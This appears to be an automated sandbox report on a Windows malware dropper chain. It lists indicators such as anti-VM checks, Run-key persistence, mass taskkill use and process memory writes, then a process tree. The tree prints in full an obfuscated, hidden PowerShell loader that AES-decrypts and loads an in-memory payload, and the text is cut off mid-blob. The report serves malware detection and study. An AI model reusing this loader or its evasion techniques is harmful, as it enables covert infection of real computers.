\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5e4bf76d9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5e4bf76d9c.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6356 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 64 IoCs
pid Process 7660 taskkill.exe 5912 taskkill.exe 7604 taskkill.exe 5248 taskkill.exe 2008 taskkill.exe 11636 taskkill.exe 13132 taskkill.exe 4484 taskkill.exe 2184 taskkill.exe 2276 taskkill.exe 1324 taskkill.exe 2944 taskkill.exe 1292 taskkill.exe 3284 taskkill.exe 2328 taskkill.exe 2448 taskkill.exe 7452 taskkill.exe 4620 taskkill.exe 4664 taskkill.exe 6320 taskkill.exe 6496 taskkill.exe 6784 taskkill.exe 10996 taskkill.exe 4408 taskkill.exe 5276 taskkill.exe 832 taskkill.exe 2668 taskkill.exe 6392 taskkill.exe 428 taskkill.exe 1728 taskkill.exe 5140 taskkill.exe 964 taskkill.exe 1500 taskkill.exe 4928 taskkill.exe 5044 taskkill.exe 664 taskkill.exe 2596 taskkill.exe 4384 taskkill.exe 1500 taskkill.exe 6620 taskkill.exe 5088 taskkill.exe 452 taskkill.exe 5348 taskkill.exe 4348 taskkill.exe 12948 taskkill.exe 6652 taskkill.exe 4528 taskkill.exe 4500 taskkill.exe 1928 taskkill.exe 3592 taskkill.exe 6244 taskkill.exe 7988 taskkill.exe 6152 taskkill.exe 1092 taskkill.exe 11916 taskkill.exe 2984 taskkill.exe 2996 taskkill.exe 696 taskkill.exe 7196 taskkill.exe 5952 taskkill.exe 4432 taskkill.exe 5880 taskkill.exe 5408 taskkill.exe 3512 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880582502924186" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{7092A1A1-935E-448E-AE18-6040FAA0E5D9} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{17FD2C58-43AF-4A47-BB85-D89101E0361C} chrome.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{71707F41-0038-4A44-B293-1226297BCF62} msedge.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2194519399.txt\ cmd.exe File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_718592000.txt\ cmd.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3992 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2808 1r83R6.exe 2808 1r83R6.exe 728 rapes.exe 728 rapes.exe 4564 2h3853.exe 4564 2h3853.exe 4564 2h3853.exe 4564 2h3853.exe 4564 2h3853.exe 4564 2h3853.exe 4292 MSBuild.exe 4292 MSBuild.exe 4292 MSBuild.exe 4292 MSBuild.exe 3992 powershell.exe 3992 powershell.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 3420 captcha.exe 3420 captcha.exe 3420 captcha.exe 3420 captcha.exe 3420 captcha.exe 3420 captcha.exe 4952 powershell.exe 4952 powershell.exe 4952 powershell.exe 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 5476 powershell.exe 5476 powershell.exe 5476 powershell.exe 5320 a1c5de4625.exe 5320 a1c5de4625.exe 5320 a1c5de4625.exe 5320 a1c5de4625.exe 5320 a1c5de4625.exe 5320 a1c5de4625.exe 3320 rapes.exe 3320 rapes.exe 2984 5e4bf76d9c.exe 2984 5e4bf76d9c.exe 5632 chrome.exe 5632 chrome.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 1528 58424ecd61.exe 1528 58424ecd61.exe 1528 58424ecd61.exe 1528 58424ecd61.exe 1528 58424ecd61.exe 7336 MSBuild.exe 7336 MSBuild.exe 7336 MSBuild.exe 7336 MSBuild.exe 7480 8e5094a924.exe 7480 8e5094a924.exe 7480 8e5094a924.exe 7480 8e5094a924.exe 5460 MSBuild.exe -
Suspicious behavior: LoadsDriver 7 IoCs
pid Process 7840 tzutil.exe 656 Process not Found 656 Process not Found 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5716 p3hx1_003.exe 5716 p3hx1_003.exe 5716 p3hx1_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2652 tasklist.exe Token: SeDebugPrivilege 5368 tasklist.exe Token: SeDebugPrivilege 4256 tasklist.exe Token: SeDebugPrivilege 5344 tasklist.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4688 tasklist.exe Token: SeDebugPrivilege 4432 tasklist.exe Token: SeDebugPrivilege 624 tasklist.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 5780 tasklist.exe Token: SeDebugPrivilege 3168 tasklist.exe Token: SeIncreaseQuotaPrivilege 4604 powershell.exe Token: SeSecurityPrivilege 4604 powershell.exe Token: SeTakeOwnershipPrivilege 4604 powershell.exe Token: SeLoadDriverPrivilege 4604 powershell.exe Token: SeSystemProfilePrivilege 4604 powershell.exe Token: SeSystemtimePrivilege 4604 powershell.exe Token: SeProfSingleProcessPrivilege 4604 powershell.exe Token: SeIncBasePriorityPrivilege 4604 powershell.exe Token: SeCreatePagefilePrivilege 4604 powershell.exe Token: SeBackupPrivilege 4604 powershell.exe Token: SeRestorePrivilege 4604 powershell.exe Token: SeShutdownPrivilege 4604 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeSystemEnvironmentPrivilege 4604 powershell.exe Token: SeRemoteShutdownPrivilege 4604 powershell.exe Token: SeUndockPrivilege 4604 powershell.exe Token: SeManageVolumePrivilege 4604 powershell.exe Token: 33 4604 powershell.exe Token: 34 4604 powershell.exe Token: 35 4604 powershell.exe Token: 36 4604 powershell.exe Token: SeDebugPrivilege 3084 tasklist.exe Token: SeDebugPrivilege 5456 tasklist.exe Token: SeDebugPrivilege 5476 powershell.exe Token: SeDebugPrivilege 6048 tasklist.exe Token: SeDebugPrivilege 3516 tasklist.exe Token: SeDebugPrivilege 2652 tasklist.exe Token: SeDebugPrivilege 2172 tasklist.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 4532 tasklist.exe Token: SeDebugPrivilege 2584 taskkill.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 4488 taskkill.exe Token: SeDebugPrivilege 3616 taskkill.exe Token: SeDebugPrivilege 4896 taskkill.exe Token: SeDebugPrivilege 4432 taskkill.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeDebugPrivilege 832 taskkill.exe Token: SeDebugPrivilege 4620 taskkill.exe Token: SeDebugPrivilege 5832 taskkill.exe Token: SeDebugPrivilege 5912 taskkill.exe Token: SeDebugPrivilege 5088 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2984 taskkill.exe Token: SeDebugPrivilege 5956 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 5276 taskkill.exe Token: SeDebugPrivilege 5800 taskkill.exe Token: SeDebugPrivilege 2668 taskkill.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 2808 1r83R6.exe 5632 chrome.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4160 b6c719608f.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 6056 msedge.exe -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4160 b6c719608f.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4988 firefox.exe 4160 b6c719608f.exe 4160 b6c719608f.exe 4160 b6c719608f.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4988 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3280 wrote to memory of 5448 3280 file.exe 87 PID 3280 wrote to memory of 5448 3280 file.exe 87 PID 3280 wrote to memory of 5448 3280 file.exe 87 PID 2172 wrote to memory of 4784 2172 cmd.exe 88 PID 2172 wrote to memory of 4784 2172 cmd.exe 88 PID 5448 wrote to memory of 2808 5448 e9T61.exe 91 PID 5448 wrote to memory of 2808 5448 e9T61.exe 91 PID 5448 wrote to memory of 2808 5448 e9T61.exe 91 PID 3068 wrote to memory of 5244 3068 cmd.exe 92 PID 3068 wrote to memory of 5244 3068 cmd.exe 92 PID 2808 wrote to memory of 728 2808 1r83R6.exe 96 PID 2808 wrote to memory of 728 2808 1r83R6.exe 96 PID 2808 wrote to memory of 728 2808 1r83R6.exe 96 PID 5448 wrote to memory of 4564 5448 e9T61.exe 97 PID 5448 wrote to memory of 4564 5448 e9T61.exe 97 PID 5448 wrote to memory of 4564 5448 e9T61.exe 97 PID 728 wrote to memory of 2376 728 rapes.exe 103 PID 728 wrote to memory of 2376 728 rapes.exe 103 PID 2376 wrote to memory of 5912 2376 YGYZCmt.exe 106 PID 2376 wrote to memory of 5912 2376 YGYZCmt.exe 106 PID 2376 wrote to memory of 5912 2376 YGYZCmt.exe 106 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 2376 wrote to memory of 4292 2376 YGYZCmt.exe 107 PID 728 wrote to memory of 4356 728 rapes.exe 108 PID 728 wrote to memory of 4356 728 rapes.exe 108 PID 728 wrote to memory of 4356 728 rapes.exe 108 PID 4356 wrote to memory of 3788 4356 cmd.exe 110 PID 4356 wrote to memory of 3788 4356 cmd.exe 110 PID 4356 wrote to memory of 3788 4356 cmd.exe 110 PID 3788 wrote to memory of 3992 3788 cmd.exe 112 PID 3788 wrote to memory of 3992 3788 cmd.exe 112 PID 3788 wrote to memory of 3992 3788 cmd.exe 112 PID 3992 wrote to memory of 2748 3992 powershell.exe 113 PID 3992 wrote to memory of 2748 3992 powershell.exe 113 PID 3992 wrote to memory of 2748 3992 powershell.exe 113 PID 728 wrote to memory of 3420 728 rapes.exe 115 PID 728 wrote to memory of 3420 728 rapes.exe 115 PID 3420 wrote to memory of 2976 3420 captcha.exe 116 PID 3420 wrote to memory of 2976 3420 captcha.exe 116 PID 3420 wrote to memory of 5784 3420 captcha.exe 119 PID 3420 wrote to memory of 5784 3420 captcha.exe 119 PID 5784 wrote to memory of 1676 5784 net.exe 121 PID 5784 wrote to memory of 1676 5784 net.exe 121 PID 3420 wrote to memory of 1900 3420 captcha.exe 122 PID 3420 wrote to memory of 1900 3420 captcha.exe 122 PID 3420 wrote to memory of 2652 3420 captcha.exe 124 PID 3420 wrote to memory of 2652 3420 captcha.exe 124 PID 3420 wrote to memory of 5368 3420 captcha.exe 126 PID 3420 wrote to memory of 5368 3420 captcha.exe 126 PID 3420 wrote to memory of 4256 3420 captcha.exe 128 PID 3420 wrote to memory of 4256 3420 captcha.exe 128 PID 3420 wrote to memory of 5892 3420 captcha.exe 130 PID 3420 wrote to memory of 5892 3420 captcha.exe 130 PID 3420 wrote to memory of 5344 3420 captcha.exe 132 PID 3420 wrote to memory of 5344 3420 captcha.exe 132 PID 3420 wrote to memory of 4952 3420 captcha.exe 134 PID 3420 wrote to memory of 4952 3420 captcha.exe 134 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2760
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:11204
-
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e9T61.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e9T61.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1r83R6.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1r83R6.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:5912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25s